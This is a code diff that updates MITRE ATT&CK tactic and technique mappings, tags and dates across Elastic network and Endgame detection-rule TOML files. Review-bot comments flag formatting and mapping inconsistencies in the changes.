@@ -22,7 +22,14 @@ name = "Potential Network Sweep Detected" risk_score = 21 rule_id = "781f8746-2180-4691-890c-4c96d11ca91d" severity = "low" -tags = ["Domain: Network", "Use Case: Network Security Monitoring", "Tactic: Discovery", "Data Source: PAN-OS", "Resources: Investigation Guide"] +tags = [ + "Domain: Network", + "Tactic: Discovery", + "Tactic: Reconnaissance", + "Use Case: Network Security Monitoring", + "Data Source: PAN-OS", + "Resources: Investigation Guide" +] timestamp_override = "event.ingested" type = "threshold" query = ''' @@ -83,6 +90,25 @@ reference = "https://attack.mitre.org/techniques/T1046/" id = "TA0007" name = "Discovery" reference = "https://attack.mitre.org/tactics/TA0007/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1595" +name = "Active Scanning" +reference = "https://attack.mitre.org/techniques/T1595/" + +[[rule.threat.technique.subtechnique]] +id = "T1595.001" +name = "Scanning IP Blocks" +reference = "https://attack.mitre.org/techniques/T1595/001/" + +[rule.threat.tactic] +id = "TA0043" +name = "Reconnaissance" +reference = "https://attack.mitre.org/tactics/TA0043/" + [rule.threshold] field = ["source.ip"] value = 1 diff --git a/rules/network/discovery_potential_port_scan_detected.toml b/rules/network/discovery_potential_port_scan_detected.toml index 39833c138f6..872921d9502 100644 --- a/rules/network/discovery_potential_port_scan_detected.toml +++ b/rules/network/discovery_potential_port_scan_detected.toml @@ -2,7 +2,7 @@ creation_date = "2023/05/17" integration = ["network_traffic", "panw"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/02/24" [rule] author = ["Elastic"] 
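Review bot: The rewritten multi-line `tags` array ends without a trailing comma after `"Resources: Investigation Guide"`, while the other multi-line `tags` arrays in this patch (telnet, React RCE alerts) end with one; pick one form, and a trailing comma is the friendlier choice for future diffs. The same omission is in the port-scan rule immediately after this one. The new Reconnaissance entry with T1595.001 is consistent with the added `"Tactic: Reconnaissance"` tag.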
@@ -22,7 +22,14 @@ name = "Potential Network Scan Detected" risk_score = 21 rule_id = "0171f283-ade7-4f87-9521-ac346c68cc9b" severity = "low" -tags = ["Domain: Network", "Use Case: Network Security Monitoring", "Tactic: Discovery", "Data Source: PAN-OS", "Resources: Investigation Guide"] +tags = [ + "Domain: Network", + "Tactic: Discovery", + "Tactic: Reconnaissance", + "Use Case: Network Security Monitoring", + "Data Source: PAN-OS", + "Resources: Investigation Guide" +] timestamp_override = "event.ingested" type = "esql" @@ -90,3 +97,21 @@ reference = "https://attack.mitre.org/techniques/T1046/" id = "TA0007" name = "Discovery" reference = "https://attack.mitre.org/tactics/TA0007/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1595" +name = "Active Scanning" +reference = "https://attack.mitre.org/techniques/T1595/" + +[[rule.threat.technique.subtechnique]] +id = "T1595.001" +name = "Scanning IP Blocks" +reference = "https://attack.mitre.org/techniques/T1595/001/" + +[rule.threat.tactic] +id = "TA0043" +name = "Reconnaissance" +reference = "https://attack.mitre.org/tactics/TA0043/" diff --git a/rules/network/discovery_potential_syn_port_scan_detected.toml b/rules/network/discovery_potential_syn_port_scan_detected.toml index 10e3cd3c7c2..42cfe232eed 100644 --- a/rules/network/discovery_potential_syn_port_scan_detected.toml +++ b/rules/network/discovery_potential_syn_port_scan_detected.toml @@ -2,7 +2,7 @@ creation_date = "2023/05/17" integration = ["network_traffic", "panw"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/02/24" [rule] author = ["Elastic"] 
@@ -93,10 +93,16 @@ id = "T1595" name = "Active Scanning" reference = "https://attack.mitre.org/techniques/T1595/" +[[rule.threat.technique.subtechnique]] +id = "T1595.001" +name = "Scanning IP Blocks" +reference = "https://attack.mitre.org/techniques/T1595/001/" + [rule.threat.tactic] id = "TA0043" name = "Reconnaissance" reference = "https://attack.mitre.org/tactics/TA0043/" + [rule.threshold] field = ["destination.ip", "source.ip"] value = 1 diff --git a/rules/network/initial_access_fortigate_sso_login_from_unusual_source.toml b/rules/network/initial_access_fortigate_sso_login_from_unusual_source.toml index 1480a6797d8..83e4f3cdfb2 100644 --- a/rules/network/initial_access_fortigate_sso_login_from_unusual_source.toml +++ b/rules/network/initial_access_fortigate_sso_login_from_unusual_source.toml @@ -2,7 +2,7 @@ creation_date = "2026/01/28" integration = ["fortinet_fortigate"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/01/28" [rule] author = ["Elastic"] @@ -95,23 +95,19 @@ FROM logs-fortinet_fortigate.* metadata _id, _version, _index [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1078" name = "Valid Accounts" reference = "https://attack.mitre.org/techniques/T1078/" - [[rule.threat.technique.subtechnique]] id = "T1078.004" name = "Cloud Accounts" reference = "https://attack.mitre.org/techniques/T1078/004/" -[[rule.threat.technique]] -id = "T1190" -name = "Exploit Public-Facing Application" -reference = "https://attack.mitre.org/techniques/T1190/" + [rule.threat.tactic] id = "TA0001" name = "Initial Access" reference = "https://attack.mitre.org/tactics/TA0001/" + diff --git a/rules/network/initial_access_react_server_components_rce_attempt.toml b/rules/network/initial_access_react_server_components_rce_attempt.toml index 6acf88afcb6..3742e5f28eb 100644 --- a/rules/network/initial_access_react_server_components_rce_attempt.toml +++ b/rules/network/initial_access_react_server_components_rce_attempt.toml 
@@ -2,7 +2,7 @@ creation_date = "2025/12/04" integration = ["network_traffic"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/05" [rule] author = ["Elastic"] @@ -93,31 +93,31 @@ network where http.request.method == "POST" and [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1190" +name = "Exploit Public-Facing Application" +reference = "https://attack.mitre.org/techniques/T1190/" + +[rule.threat.tactic] +id = "TA0001" +name = "Initial Access" +reference = "https://attack.mitre.org/tactics/TA0001/" +[[rule.threat]] +framework = "MITRE ATT&CK" [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" - [[rule.threat.technique.subtechnique]] id = "T1059.007" name = "JavaScript" reference = "https://attack.mitre.org/techniques/T1059/007/" + + [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1190" -name = "Exploit Public-Facing Application" -reference = "https://attack.mitre.org/techniques/T1190/" - -[rule.threat.tactic] -id = "TA0001" -name = "Initial Access" -reference = "https://attack.mitre.org/tactics/TA0001/" diff --git a/rules/network/initial_access_react_server_rce_network_alerts.toml b/rules/network/initial_access_react_server_rce_network_alerts.toml index 0005908b26e..c319a5afcc6 100644 --- a/rules/network/initial_access_react_server_rce_network_alerts.toml +++ b/rules/network/initial_access_react_server_rce_network_alerts.toml @@ -2,7 +2,7 @@ creation_date = "2025/12/10" integration = ["panw", "cisco_ftd", "fortinet_fortigate", "suricata"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/10" [rule] author = ["Elastic"] 
@@ -55,7 +55,20 @@ references = [ risk_score = 73 rule_id = "1aefed68-eecd-47cc-9044-4a394b60061d" severity = "high" -tags = ["Domain: Network", "Domain: Application", "Domain: Web", "Use Case: Threat Detection", "Use Case: Vulnerability", "Tactic: Initial Access", "Data Source: PAN-OS", "Data Source: Fortinet", "Data Source: Suricata", "Data Source: Cisco FTD", "Resources: Investigation Guide"] +tags = [ + "Domain: Network", + "Domain: Application", + "Domain: Web", + "Use Case: Threat Detection", + "Use Case: Vulnerability", + "Tactic: Initial Access", + "Tactic: Execution", + "Data Source: PAN-OS", + "Data Source: Fortinet", + "Data Source: Suricata", + "Data Source: Cisco FTD", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "query" @@ -69,13 +82,31 @@ query = ''' [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1190" name = "Exploit Public-Facing Application" reference = "https://attack.mitre.org/techniques/T1190/" + [rule.threat.tactic] id = "TA0001" name = "Initial Access" reference = "https://attack.mitre.org/tactics/TA0001/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1059" +name = "Command and Scripting Interpreter" +reference = "https://attack.mitre.org/techniques/T1059/" +[[rule.threat.technique.subtechnique]] +id = "T1059.007" +name = "JavaScript" +reference = "https://attack.mitre.org/techniques/T1059/007/" + + + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" + diff --git a/rules/network/initial_access_rpc_remote_procedure_call_from_the_internet.toml b/rules/network/initial_access_rpc_remote_procedure_call_from_the_internet.toml index 57bd58826e7..492129f623e 100644 --- a/rules/network/initial_access_rpc_remote_procedure_call_from_the_internet.toml +++ b/rules/network/initial_access_rpc_remote_procedure_call_from_the_internet.toml 
@@ -2,7 +2,7 @@ creation_date = "2020/02/18" integration = ["network_traffic", "panw"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/03/02" [rule] author = ["Elastic"] @@ -101,13 +101,14 @@ RPC enables remote management and resource sharing, crucial for system administr [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1133" -name = "External Remote Services" -reference = "https://attack.mitre.org/techniques/T1133/" +id = "T1190" +name = "Exploit Public-Facing Application" +reference = "https://attack.mitre.org/techniques/T1190/" + [rule.threat.tactic] id = "TA0001" name = "Initial Access" reference = "https://attack.mitre.org/tactics/TA0001/" + diff --git a/rules/network/initial_access_rpc_remote_procedure_call_to_the_internet.toml b/rules/network/initial_access_rpc_remote_procedure_call_to_the_internet.toml index c2559471478..2072a632c94 100644 --- a/rules/network/initial_access_rpc_remote_procedure_call_to_the_internet.toml +++ b/rules/network/initial_access_rpc_remote_procedure_call_to_the_internet.toml @@ -2,7 +2,7 @@ creation_date = "2020/02/18" integration = ["network_traffic", "panw"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/01/15" [rule] author = ["Elastic"] @@ -21,7 +21,7 @@ references = ["https://www.iana.org/assignments/iana-ipv4-special-registry/iana- risk_score = 73 rule_id = "32923416-763a-4531-bb35-f33b9232ecdb" severity = "high" -tags = ["Domain: Endpoint", "Use Case: Threat Detection", "Tactic: Command and Control", "Tactic: Lateral Movement", "Data Source: PAN-OS", "Resources: Investigation Guide"] +tags = ["Tactic: Initial Access", "Domain: Endpoint", "Use Case: Threat Detection", "Data Source: PAN-OS", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "query" 
@@ -100,26 +100,14 @@ RPC enables remote management and resource sharing across networks, crucial for [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1071" -name = "Application Layer Protocol" -reference = "https://attack.mitre.org/techniques/T1071/" - -[rule.threat.tactic] -id = "TA0011" -name = "Command and Control" -reference = "https://attack.mitre.org/tactics/TA0011/" - -[[rule.threat]] -framework = "MITRE ATT&CK" +id = "T1190" +name = "Exploit Public-Facing Application" +reference = "https://attack.mitre.org/techniques/T1190/" -[[rule.threat.technique]] -id = "T1021" -name = "Remote Services" -reference = "https://attack.mitre.org/techniques/T1021/" [rule.threat.tactic] -id = "TA0008" -name = "Lateral Movement" -reference = "https://attack.mitre.org/tactics/TA0008/" +id = "TA0001" +name = "Initial Access" +reference = "https://attack.mitre.org/tactics/TA0001/" + diff --git a/rules/network/initial_access_smb_windows_file_sharing_activity_to_the_internet.toml b/rules/network/initial_access_smb_windows_file_sharing_activity_to_the_internet.toml index 0d15c5e57be..18f1e6a95d9 100644 --- a/rules/network/initial_access_smb_windows_file_sharing_activity_to_the_internet.toml +++ b/rules/network/initial_access_smb_windows_file_sharing_activity_to_the_internet.toml @@ -2,7 +2,7 @@ creation_date = "2020/02/18" integration = ["network_traffic", "panw"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/01/07" [rule] author = ["Elastic"] 
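Review bot: The replacement mapping — T1190 "Exploit Public-Facing Application" under Initial Access — describes inbound exploitation, but this rule (`..._to_the_internet`) fires on RPC traffic leaving the network toward external addresses, so the direction is inverted; the removed Command and Control (T1071) and Lateral Movement (T1021) entries, or an exfiltration/C2 mapping, describe outbound RPC better. The SMB-to-the-internet rule later in this patch gets the same T1190/Initial Access entry and has the same direction problem. The `@@ -21,7 +21,7 @@` tag change in the preceding hunk is at least consistent with this new threat block, so both would need to move together if the mapping is corrected.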
@@ -21,7 +21,7 @@ references = ["https://www.iana.org/assignments/iana-ipv4-special-registry/iana- risk_score = 47 rule_id = "c82b2bd8-d701-420c-ba43-f11a155b681a" severity = "medium" -tags = ["Domain: Network", "Use Case: Threat Detection", "Tactic: Exfiltration", "Data Source: PAN-OS", "Resources: Investigation Guide"] +tags = ["Tactic: Initial Access", "Domain: Network", "Use Case: Threat Detection", "Data Source: PAN-OS", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "new_terms" @@ -101,16 +101,30 @@ SMB, a protocol for sharing files and resources within trusted networks, is vuln [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1190" +name = "Exploit Public-Facing Application" +reference = "https://attack.mitre.org/techniques/T1190/" + +[rule.threat.tactic] +id = "TA0001" +name = "Initial Access" +reference = "https://attack.mitre.org/tactics/TA0001/" +[[rule.threat]] +framework = "MITRE ATT&CK" [[rule.threat.technique]] id = "T1048" name = "Exfiltration Over Alternative Protocol" reference = "https://attack.mitre.org/techniques/T1048/" + [rule.threat.tactic] id = "TA0010" name = "Exfiltration" reference = "https://attack.mitre.org/tactics/TA0010/" + + [rule.new_terms] field = "new_terms_fields" value = ["source.ip"] diff --git a/rules/network/initial_access_unsecure_elasticsearch_node.toml b/rules/network/initial_access_unsecure_elasticsearch_node.toml index d3e5aeaf8b8..3e4f65b7211 100644 --- a/rules/network/initial_access_unsecure_elasticsearch_node.toml +++ b/rules/network/initial_access_unsecure_elasticsearch_node.toml @@ -2,7 +2,7 @@ creation_date = "2020/08/11" integration = ["network_traffic"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/01/15" [rule] author = ["Elastic"] 
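Review bot: The new `tags` line for this smb rule drops `"Tactic: Exfiltration"` while the threat hunk below still declares the `TA0010` / `Exfiltration` entry alongside the added `TA0001` / `Initial Access` one, so the tags no longer mirror the declared tactics the way the other hunks in this patch keep them aligned. The line should be `tags = ["Tactic: Initial Access", "Tactic: Exfiltration", "Domain: Network", "Use Case: Threat Detection", "Data Source: PAN-OS", "Resources: Investigation Guide"]`. The same gap appears in collection_email_outlook_mailbox_via_com.toml, collection_posh_audio_capture.toml and collection_posh_keylogger.toml, where `"Tactic: Execution"` is removed from `tags` but the `TA0002` threat entry remains on the new side.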
@@ -66,7 +66,7 @@ references = [ risk_score = 47 rule_id = "31295df3-277b-4c56-a1fb-84e31b4222a9" severity = "medium" -tags = ["Use Case: Threat Detection", "Domain: Endpoint", "Tactic: Reconnaissance", "Resources: Investigation Guide"] +tags = ["Use Case: Threat Detection", "Tactic: Initial Access", "Domain: Endpoint", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "query" @@ -79,13 +79,14 @@ query = ''' [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1595" -name = "Active Scanning" -reference = "https://attack.mitre.org/techniques/T1595/" +id = "T1190" +name = "Exploit Public-Facing Application" +reference = "https://attack.mitre.org/techniques/T1190/" + [rule.threat.tactic] -id = "TA0043" -name = "Reconnaissance" -reference = "https://attack.mitre.org/tactics/TA0043/" +id = "TA0001" +name = "Initial Access" +reference = "https://attack.mitre.org/tactics/TA0001/" + diff --git a/rules/promotions/credential_access_endgame_cred_dumping_detected.toml b/rules/promotions/credential_access_endgame_cred_dumping_detected.toml index 41db6231b23..d38cd884d91 100644 --- a/rules/promotions/credential_access_endgame_cred_dumping_detected.toml +++ b/rules/promotions/credential_access_endgame_cred_dumping_detected.toml @@ -2,7 +2,7 @@ creation_date = "2020/02/18" maturity = "production" promotion = true -updated_date = "2026/03/23" +updated_date = "2025/03/21" [rule] author = ["Elastic"] @@ -73,13 +73,19 @@ Elastic Endgame is a security solution that monitors and detects suspicious acti [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1003" name = "OS Credential Dumping" reference = "https://attack.mitre.org/techniques/T1003/" +[[rule.threat.technique.subtechnique]] +id = "T1003.001" +name = "LSASS Memory" +reference = "https://attack.mitre.org/techniques/T1003/001/" + + [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" + 
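Review bot: The credential_access_endgame_cred_dumping_detected.toml hunk narrows the mapping by adding `id = "T1003.001"` / `name = "LSASS Memory"` under T1003, but nothing in the hunk shows that the Endgame credential-dumping alert is limited to LSASS access. If the upstream detection also fires on other dumping paths, the subtechnique under-reports what the rule covers; if it is LSASS-specific, a one-line note in the rule description saying so would justify the narrowing.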
diff --git a/rules/promotions/endgame_ransomware_detected.toml b/rules/promotions/endgame_ransomware_detected.toml index f52d51ab54c..9f8c169466d 100644 --- a/rules/promotions/endgame_ransomware_detected.toml +++ b/rules/promotions/endgame_ransomware_detected.toml @@ -2,7 +2,7 @@ creation_date = "2020/02/18" maturity = "production" promotion = true -updated_date = "2026/03/23" +updated_date = "2025/03/21" [rule] author = ["Elastic"] @@ -25,7 +25,7 @@ setup = """## Setup For information on troubleshooting the maximum alerts warning please refer to this [guide](https://www.elastic.co/guide/en/security/current/alerts-ui-monitor.html#troubleshoot-max-alerts). """ severity = "critical" -tags = ["Tactic: Impact", "Data Source: Elastic Endgame", "Resources: Investigation Guide"] +tags = ["Data Source: Elastic Endgame", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "query" @@ -67,15 +67,3 @@ Elastic Endgame is a security solution designed to detect and respond to threats - Enhance monitoring and detection capabilities by configuring alerts for similar event patterns and behaviors identified in the query fields. - Report the incident to relevant authorities and stakeholders as per organizational policy and legal requirements, ensuring compliance with any regulatory obligations.""" -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1486" -name = "Data Encrypted for Impact" -reference = "https://attack.mitre.org/techniques/T1486/" - -[rule.threat.tactic] -id = "TA0040" -name = "Impact" -reference = "https://attack.mitre.org/tactics/TA0040/" diff --git a/rules/promotions/endgame_ransomware_prevented.toml b/rules/promotions/endgame_ransomware_prevented.toml index 4e91b760d30..28f96352a27 100644 --- a/rules/promotions/endgame_ransomware_prevented.toml +++ b/rules/promotions/endgame_ransomware_prevented.toml 
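Review bot: The threat hunk for endgame_ransomware_detected.toml removes the whole `[[rule.threat]]` block and the `"Tactic: Impact"` tag, leaving the rule with no ATT&CK mapping at all, so alerts from it carry no tactic or technique and T1486 disappears from coverage reporting. The same full removal happens in endgame_ransomware_prevented.toml and in threat_intel_indicator_match_email.toml (which loses T1566 / Initial Access). Given that each file's `updated_date` also moves backwards in this patch, this looks more like a stale base than a deliberate decision; if it is deliberate, the commit message should say why these rules should carry no mapping.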
@@ -2,7 +2,7 @@ creation_date = "2020/02/18" maturity = "production" promotion = true -updated_date = "2026/03/23" +updated_date = "2025/03/21" [rule] author = ["Elastic"] @@ -26,7 +26,7 @@ setup = """## Setup For information on troubleshooting the maximum alerts warning please refer to this [guide](https://www.elastic.co/guide/en/security/current/alerts-ui-monitor.html#troubleshoot-max-alerts). """ severity = "high" -tags = ["Tactic: Impact", "Data Source: Elastic Endgame", "Resources: Investigation Guide"] +tags = ["Data Source: Elastic Endgame", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "query" @@ -69,15 +69,3 @@ Elastic Endgame is a security solution designed to prevent ransomware by monitor - Notify the IT security team and relevant stakeholders about the incident for awareness and further investigation into potential vulnerabilities exploited. - Document the incident details, including the response actions taken, to improve future incident response strategies and facilitate any necessary reporting or compliance requirements.""" -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1486" -name = "Data Encrypted for Impact" -reference = "https://attack.mitre.org/techniques/T1486/" - -[rule.threat.tactic] -id = "TA0040" -name = "Impact" -reference = "https://attack.mitre.org/tactics/TA0040/" diff --git a/rules/promotions/execution_endgame_exploit_detected.toml b/rules/promotions/execution_endgame_exploit_detected.toml index 377f3d62796..c74ed775d20 100644 --- a/rules/promotions/execution_endgame_exploit_detected.toml +++ b/rules/promotions/execution_endgame_exploit_detected.toml @@ -2,7 +2,7 @@ creation_date = "2020/02/18" maturity = "production" promotion = true -updated_date = "2026/03/23" +updated_date = "2025/03/21" [rule] author = ["Elastic"] 
@@ -26,7 +26,13 @@ setup = """## Setup For information on troubleshooting the maximum alerts warning please refer to this [guide](https://www.elastic.co/guide/en/security/current/alerts-ui-monitor.html#troubleshoot-max-alerts). """ severity = "high" -tags = ["Tactic: Execution", "Data Source: Elastic Endgame", "Use Case: Threat Detection", "Resources: Investigation Guide"] +tags = [ + "Data Source: Elastic Endgame", + "Use Case: Threat Detection", + "Tactic: Execution", + "Tactic: Privilege Escalation", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "query" @@ -72,12 +78,20 @@ Elastic Endgame is a security solution that monitors and detects exploit attempt [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1203" -name = "Exploitation for Client Execution" -reference = "https://attack.mitre.org/techniques/T1203/" - [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1068" +name = "Exploitation for Privilege Escalation" +reference = "https://attack.mitre.org/techniques/T1068/" + + +[rule.threat.tactic] +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" + diff --git a/rules/promotions/execution_endgame_exploit_prevented.toml b/rules/promotions/execution_endgame_exploit_prevented.toml index 6e9ceb442ad..9882090ac4d 100644 --- a/rules/promotions/execution_endgame_exploit_prevented.toml +++ b/rules/promotions/execution_endgame_exploit_prevented.toml @@ -2,7 +2,7 @@ creation_date = "2020/02/18" maturity = "production" promotion = true -updated_date = "2026/03/23" +updated_date = "2025/03/21" [rule] author = ["Elastic"] 
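Review bot: After the removal of `T1203` in the execution_endgame_exploit_detected.toml threat hunk, the first `[[rule.threat]]` entry carries only `[rule.threat.tactic]` / `id = "TA0002"` with no technique, which loads if the schema treats technique as optional (I cannot confirm that from here) but conveys less than the `T1068` entry next to it. The added second entry is also laid out differently from the first: no blank line between `[[rule.threat]]` and `[[rule.threat.technique]]`, and two blank lines before `[rule.threat.tactic]`. The same tactic-only entry and layout pattern appears in execution_endgame_exploit_prevented.toml.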
@@ -80,25 +80,20 @@ Elastic Endgame is a security solution designed to prevent exploits by monitorin [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1203" -name = "Exploitation for Client Execution" -reference = "https://attack.mitre.org/techniques/T1203/" - [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" - [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1068" name = "Exploitation for Privilege Escalation" reference = "https://attack.mitre.org/techniques/T1068/" + [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" + diff --git a/rules/promotions/privilege_escalation_endgame_cred_manipulation_detected.toml b/rules/promotions/privilege_escalation_endgame_cred_manipulation_detected.toml index d25aef0cd49..c828eafd159 100644 --- a/rules/promotions/privilege_escalation_endgame_cred_manipulation_detected.toml +++ b/rules/promotions/privilege_escalation_endgame_cred_manipulation_detected.toml @@ -2,7 +2,7 @@ creation_date = "2020/02/18" maturity = "production" promotion = true -updated_date = "2026/03/23" +updated_date = "2025/03/21" [rule] author = ["Elastic"] @@ -26,7 +26,7 @@ setup = """## Setup For information on troubleshooting the maximum alerts warning please refer to this [guide](https://www.elastic.co/guide/en/security/current/alerts-ui-monitor.html#troubleshoot-max-alerts). """ severity = "high" -tags = ["Tactic: Defense Evasion", "Tactic: Privilege Escalation", "Data Source: Elastic Endgame", "Use Case: Threat Detection", "Resources: Investigation Guide"] +tags = ["Data Source: Elastic Endgame", "Use Case: Threat Detection", "Tactic: Privilege Escalation", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "query" 
@@ -72,26 +72,14 @@ Elastic Endgame is a security solution that monitors and detects suspicious acti [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1134" name = "Access Token Manipulation" reference = "https://attack.mitre.org/techniques/T1134/" -[rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1134" -name = "Access Token Manipulation" -reference = "https://attack.mitre.org/techniques/T1134/" [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" + diff --git a/rules/promotions/privilege_escalation_endgame_cred_manipulation_prevented.toml b/rules/promotions/privilege_escalation_endgame_cred_manipulation_prevented.toml index ee8309c7d75..654389a20dd 100644 --- a/rules/promotions/privilege_escalation_endgame_cred_manipulation_prevented.toml +++ b/rules/promotions/privilege_escalation_endgame_cred_manipulation_prevented.toml @@ -2,7 +2,7 @@ creation_date = "2020/02/18" maturity = "production" promotion = true -updated_date = "2026/03/23" +updated_date = "2025/03/21" [rule] author = ["Elastic"] @@ -26,7 +26,7 @@ setup = """## Setup For information on troubleshooting the maximum alerts warning please refer to this [guide](https://www.elastic.co/guide/en/security/current/alerts-ui-monitor.html#troubleshoot-max-alerts). """ severity = "medium" -tags = ["Tactic: Defense Evasion", "Tactic: Privilege Escalation", "Data Source: Elastic Endgame", "Use Case: Threat Detection", "Resources: Investigation Guide"] +tags = ["Data Source: Elastic Endgame", "Use Case: Threat Detection", "Tactic: Privilege Escalation", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "query" 
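Review bot: The new side of privilege_escalation_endgame_cred_manipulation_detected.toml keeps `T1134` only under `TA0004` / `Privilege Escalation`; ATT&CK lists Access Token Manipulation under both Defense Evasion and Privilege Escalation, so the coverage view loses the Defense Evasion association this rule previously reported. The same narrowing is applied to the cred_manipulation_prevented, permission_theft (T1134.001) and process_injection (T1055, also dual Defense Evasion / Privilege Escalation) rules that follow, and to collection_posh_keylogger.toml, where the Credential Access entry for T1056.001 is dropped. If a single tactic per technique is the intended convention, stating that in the commit message would help; otherwise keeping the second `[[rule.threat]]` entry preserves the reporting.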
@@ -72,26 +72,14 @@ Elastic Endgame is a security solution that prevents unauthorized credential man [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1134" name = "Access Token Manipulation" reference = "https://attack.mitre.org/techniques/T1134/" -[rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1134" -name = "Access Token Manipulation" -reference = "https://attack.mitre.org/techniques/T1134/" [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" + diff --git a/rules/promotions/privilege_escalation_endgame_permission_theft_detected.toml b/rules/promotions/privilege_escalation_endgame_permission_theft_detected.toml index cd8997f1f08..da56645fb6b 100644 --- a/rules/promotions/privilege_escalation_endgame_permission_theft_detected.toml +++ b/rules/promotions/privilege_escalation_endgame_permission_theft_detected.toml @@ -2,7 +2,7 @@ creation_date = "2020/02/18" maturity = "production" promotion = true -updated_date = "2026/03/23" +updated_date = "2025/03/21" [rule] author = ["Elastic"] @@ -26,7 +26,7 @@ setup = """## Setup For information on troubleshooting the maximum alerts warning please refer to this [guide](https://www.elastic.co/guide/en/security/current/alerts-ui-monitor.html#troubleshoot-max-alerts). """ severity = "high" -tags = ["Tactic: Defense Evasion", "Tactic: Privilege Escalation", "Data Source: Elastic Endgame", "Use Case: Threat Detection", "Resources: Investigation Guide"] +tags = ["Data Source: Elastic Endgame", "Use Case: Threat Detection", "Tactic: Privilege Escalation", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "query" 
@@ -72,36 +72,14 @@ Elastic Endgame is a security solution that monitors and detects unauthorized ac [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1134" name = "Access Token Manipulation" reference = "https://attack.mitre.org/techniques/T1134/" -[[rule.threat.technique.subtechnique]] -id = "T1134.001" -name = "Token Impersonation/Theft" -reference = "https://attack.mitre.org/techniques/T1134/001/" - -[rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1134" -name = "Access Token Manipulation" -reference = "https://attack.mitre.org/techniques/T1134/" - -[[rule.threat.technique.subtechnique]] -id = "T1134.001" -name = "Token Impersonation/Theft" -reference = "https://attack.mitre.org/techniques/T1134/001/" [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" + diff --git a/rules/promotions/privilege_escalation_endgame_permission_theft_prevented.toml b/rules/promotions/privilege_escalation_endgame_permission_theft_prevented.toml index 70363bba749..9b43b081eca 100644 --- a/rules/promotions/privilege_escalation_endgame_permission_theft_prevented.toml +++ b/rules/promotions/privilege_escalation_endgame_permission_theft_prevented.toml @@ -2,7 +2,7 @@ creation_date = "2020/02/18" maturity = "production" promotion = true -updated_date = "2026/03/23" +updated_date = "2025/03/21" [rule] author = ["Elastic"] 
